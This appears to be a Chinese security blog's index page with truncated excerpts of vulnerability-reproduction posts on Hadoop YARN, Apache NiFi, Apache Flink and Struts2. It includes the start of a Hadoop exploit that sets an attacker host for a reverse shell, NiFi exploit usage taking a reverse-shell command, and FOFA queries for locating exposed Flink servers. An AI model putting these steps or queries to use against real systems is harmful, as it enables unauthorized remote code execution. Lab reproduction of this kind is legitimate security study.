Birdman-one的博客

WebSphere为SOA（面向服务架构）环境提供软件，以实现动态的、互联的业务流程，为所有业务情形提供高度有效的应用程序基础架构。WebSphere是IBM的应用程序和集成软件平台，包含所有必要的中间件基础架构（包括服务器、服务和工具），这些基础架构是创建、部署、运行和持续监视企业级Web应用程序和跨平台、跨产品的解决方案所必需的。与WAS6，WAS7相比较而言WAS8发生了很大的改变，其安装介质和以前截然不同；并且官网已经明确说明：版本1.7.4.7及更早版本已被1.8.x和1.9.x版本取代。

Hadoop未授权访问getshell一、环境搭建cd /vulhub/hadoop/unauthorized-yarndocker-compose up -dhttp://ip:8088/cluster访问地址出现此页面代表未授权访问二、漏洞复现exp#!/usr/bin/env pythonimport requeststarget = 'http://xx.xx.xx.xx:8088/'lhost = 'x.x.x.x' # 把你的本地主机ip放在这里，在9999端口监

Apache NiFi远程代码执行-RCE简介：Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。EXP：https://github.com/imjdl/Apache-NiFi-Api-RCE作者这里使用exp不行使用方法：python exp.py [url] [反弹shell命令]MSF module：https://github.com/rapid7/metasp

Apache Flink 未授权访问+远程代码执行作者：Birdman-one前言近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞，影响范围：<= 1.9.1(最新版本)此次复现就是通过版本Version: 1.10.1进行复现利用。FOFAFOFA 语句app="Apache-Flink" && country="CN"app="Apache-Flink" && country="CN" &&am

s2-061Struts2介绍是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品，是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心，采用拦截器的机制来处理用户的请求，这样的设计也使得业务逻辑

s2-059Struts2介绍是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品，是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心，采用拦截器的机制来处理用户的请求，这样的设计也使得业务逻辑控